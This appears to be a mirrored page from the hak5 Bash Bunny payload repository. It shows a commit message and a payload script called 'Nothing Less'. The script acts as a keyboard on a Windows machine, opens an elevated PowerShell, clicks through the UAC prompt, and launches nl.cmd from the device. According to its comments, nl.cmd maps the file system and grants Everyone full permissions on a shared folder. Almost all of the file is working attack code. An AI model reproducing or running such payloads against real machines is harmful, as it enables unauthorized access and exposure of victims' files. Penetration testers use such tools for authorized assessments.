mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
5a77792c1d
* Updated all Payloads for Version 1.2+ Fixed Style Issues on extensions and payloads. Added GET TARGET_OS to get.sh Removed and Fixed all uses ducky_helper.sh (Issue #248) Removed all mention of DUCKY_LANG (Issue #248) Renamed Payloads with spaces in name Added an extension to keep Macs Happy Added a payload for Mac DNS poisoning Fixed Issue #271 changed wget to curl -o Implemented PR #268 Implemented PR #273 * Fixed e.cmd * Fix e.cmd pt2 * Fixed Issues Fixed issues pointed out by @sebkinne Fixed styling errors
49 lines
932 B
Bash
49 lines
932 B
Bash
#!/bin/bash
|
|
#
|
|
# Title: Nothing Less
|
|
# Author: StinkyBliss
|
|
# Version: 1.0
|
|
# Target: Windows
|
|
#
|
|
#
|
|
# Maps the file system and stores it in c:\users\tempa
|
|
# Shares a location to everyone and grants full security permissions to everyone
|
|
#
|
|
# For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
|
|
# To share a drive change the path in nl.cmd to c: remove the quotes
|
|
|
|
LED SETUP
|
|
GET SWITCH_POSITION
|
|
|
|
LED STAGE1
|
|
|
|
ATTACKMODE HID
|
|
|
|
Q GUI r
|
|
Q DELAY 100
|
|
Q STRING powershell Start-Process powershell -Verb runAs
|
|
#Q STRING powershell
|
|
Q ENTER
|
|
|
|
# Bypass UAC
|
|
Q DELAY 1000
|
|
Q LEFT
|
|
Q ENTER
|
|
|
|
LED STAGE2
|
|
|
|
ATTACKMODE HID STORAGE
|
|
|
|
# Start nl.cmd
|
|
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')"
|
|
Q ENTER
|
|
|
|
# Wait for nl.cmd and exit
|
|
Q DELAY 1000
|
|
Q STRING exit
|
|
Q ENTER
|
|
|
|
sync
|
|
|
|
LED FINISH
|